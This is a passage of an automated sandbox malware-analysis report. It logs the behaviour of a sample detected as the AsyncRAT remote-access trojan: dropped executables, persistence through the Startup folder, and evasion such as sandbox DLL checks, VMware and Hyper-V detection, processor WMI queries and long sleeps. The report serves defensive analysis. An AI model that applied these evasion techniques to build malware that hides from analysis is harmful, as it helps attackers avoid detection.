Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: tmp87E4.tmp.exe, tmp87E4.tmp.exe.2.dr Binary or memory string: SBIEDLL.DLL
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\pgr.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Window / User API: threadDelayed 5377 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Window / User API: threadDelayed 703 Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe Window / User API: threadDelayed 5808 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Window / User API: threadDelayed 684 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Window / User API: threadDelayed 9071 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188 Thread sleep count: 5808 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe TID: 3084 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148 Thread sleep count: 90 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476 Thread sleep count: 684 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476 Thread sleep count: 9071 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052 Thread sleep time: -140000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -1100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\servieda.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00406EC3
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 120000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 140000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000002.373872355.000001B866570000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWX
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: tmp87E4.tmp.exe.2.dr Binary or memory string: vmware
Source: Tmp.exe, 00000001.00000002.368050117.0000000000690000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
Source: servieda.exe, 00000003.00000002.600571668.000000000067B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: wscript.exe, 00000000.00000003.342673260.000001B8665AF000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
Source: C:\Users\user\AppData\Roaming\servieda.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
